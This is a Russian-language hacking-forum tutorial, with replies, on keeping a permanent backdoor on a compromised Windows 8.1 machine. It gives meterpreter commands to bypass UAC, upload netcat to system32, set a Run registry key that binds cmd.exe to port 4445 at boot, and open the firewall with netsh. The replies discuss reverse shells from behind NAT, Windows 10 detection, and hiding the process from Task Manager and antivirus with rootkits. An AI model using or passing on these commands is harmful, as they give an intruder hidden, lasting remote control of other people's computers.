Статья Permanent Backdoor

Привет! В данной публикации, я покажу, как осуществить постоянный доступ к уязвимому, к примеру, посредством reverse shell (meterpreter) компьютеру.

upload_2016-10-31_21-14-49.png


В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109. Итак, нам понадобится открытая сессия meterpreter:

upload_2016-10-31_21-15-24.png


Для продолжения, необходимо обойти UAC на целевом хосте:

> use exploit/windows/local/bypassuac_injection

И по порядку выполняем команды, как показано на скриншоте ниже:

upload_2016-10-31_21-15-50.png


В случае успеха вывод команды getsystem будет таким:

upload_2016-10-31_21-16-18.png


Теперь, необходимо загрузить на целевую систему программу netcat - это утилита Unix, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их. Делается это следующим образом, вводим в консоли meterpreter:

> upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

upload_2016-10-31_21-16-51.png


Затем редактируем реестр цели, для запуска netcat при загрузке:

> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat –d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’


upload_2016-10-31_21-17-43.png


Открываем shell, для того чтобы внести свои поправки в firewall целевого хоста.

> shell

upload_2016-10-31_21-18-18.png


Вносим правило в firewall:

> netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445

netsh —
программа, включенная в линейку продуктов операционных систем Microsoft Windows NT начиная с Windows 2000. Она позволяет осуществлять локальное или удаленное конфигурирование сетевых параметров.

upload_2016-10-31_21-20-47.png


Убедимся, что наши усилия не прошли даром, и правило было успешно добавлено:

> netsh firewall show portopening

upload_2016-10-31_21-21-27.png


Все ок. Перезагрузим целевой хост, а перед этим откроем второй терминал в Kali и введем команду:

> nc -nv 192.168.0.109 4445 (Где 192.168.0.109 – адрес целевой машины)

После перезагрузки получаем shell на целевой системе:

upload_2016-10-31_21-22-43.png
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Можно и в глобальной, есть статья по теме
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Можно.Только вам нужен белый ip, или можете воспользоваться сервисом no-ip и не забудьте пробросить порты ...
 
  • Нравится
Реакции: ghostphisher

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
Есть одна поправачка. Если жертва за натом. то nc кидаем как реверс шелл nc <наш листенер>
 
  • Нравится
Реакции: ghostphisher

thunder

Green Team
08.12.2016
219
26
BIT
0
Vander,kot-gor: Опять (улыбнуло)извиняюсь за глупый вопрос.. Заинтересовал такой момент.. ну вот мигрировал я процесс (migrate explorer ) ,на атакуемой машине удалил сам вирус (файл с помощью которого получил сессию ) , так же получил права администратора .. Есть ли такая возможность .. с помощью данной команды
Код:
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v  мой порт -в с:\\?\\?\\?
прописать в реестре чтобы (тот процесс в который а мигрировал , запускался с виндовой ) ? Или без файла(вируса которого я удалил ) это нереально ? Прошу меня камнями не бросать (улыбнуло) Я еще только учусь (улыбнуло)
[doublepost=1483542597,1483542197][/doublepost]SooLFaa: Спасибо за отзывчивость (ответ). Мне (улыбнуло) из того что Вы написали (улыбнуло) понятно только "Есть одна поправачка. Если жертва за ....... все остальное для меня, как китайский язык (улыбнуло).
[doublepost=1483611580][/doublepost]Vander: Я так понимаю ..данный гайд не работает на windows 10 (палится) ? Есть ли еще какие не будь актуальные способы повысить свои права до админа? Объединив данный гайд с выше изложенным/видео-как сделать чтобы backdoor загружался с виндой , не могу разобраться , как прописать(добавить) в реестр исполняемый файл (backdoor)..Ссылка на видео ..о мои манипуляциях (улыбнуло)
сразу извинюсь за длинное видео (так же за мои тормоза)
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Без файла который вы удалили - это нереально. Meterpreter не оставляет после перезагрузки следов всего присутствия, если файл с ним был удален.

Узнайте, что такое NAT и bind/reverse shell - это несложно.

Windows 10... что-то однозначное сказать сложно, из 3-4 дистров на каких пробовал, спалился на 2-ух точно. Есть https://codeby.net/threads/bypass-uac-metasploit.57901/ - Тут про обход UAC на 10-ке тоже.
 
  • Нравится
Реакции: thunder и ghostphisher

thunder

Green Team
08.12.2016
219
26
BIT
0
Без файла который вы удалили - это нереально. Meterpreter не оставляет после перезагрузки следов всего присутствия, если файл с ним был удален.

Узнайте, что такое NAT и bind/reverse shell - это несложно.

Windows 10... что-то однозначное сказать сложно, из 3-4 дистров на каких пробовал, спалился на 2-ух точно. Есть https://codeby.net/threads/bypass-uac-metasploit.57901/ - Тут про обход UAC на 10-ке тоже.
Данный скрипт (команда)
Код:
use exploit/windows/local/bypassuac_injection
работает только с x64 windows (как быть с x86 windows) ?
 

thunder

Green Team
08.12.2016
219
26
BIT
0
Уважаемы Vander, а возможно ли сделать чтобы процесс " ncat" в диспетчере задач был не убиваемым(или невидимым) ? Может путь изменить (папку Run) или без нее автозапуск файла не возможен ?
[doublepost=1483877940,1483816514][/doublepost]Vander: В продолжение темы .. Узнал ,что есть такой зверь " Rootkits" ( как я понял ..с помощью rootkits можно спрятать генерированный файл (к примеру в veil) от антивирусов,а так же скрыть действующий процесс в диспетчере задач. Вопрос.. есть ли какой нибудь понятный/толковый гайд , на данную тему ?
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Уважаемы Vander, а возможно ли сделать чтобы процесс " ncat" в диспетчере задач был не убиваемым(или невидимым) ? Может путь изменить (папку Run) или без нее автозапуск файла не возможен ?
[doublepost=1483877940,1483816514][/doublepost]Vander: В продолжение темы .. Узнал ,что есть такой зверь " Rootkits" ( как я понял ..с помощью rootkits можно спрятать генерированный файл (к примеру в veil) от антивирусов,а так же скрыть действующий процесс в диспетчере задач. Вопрос.. есть ли какой нибудь понятный/толковый гайд , на данную тему ?
Ответил в ЛС.
 

Chena

Green Team
10.02.2017
12
4
BIT
0
На Win10 Access is denied . Будим другой вектор атаки делать .
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!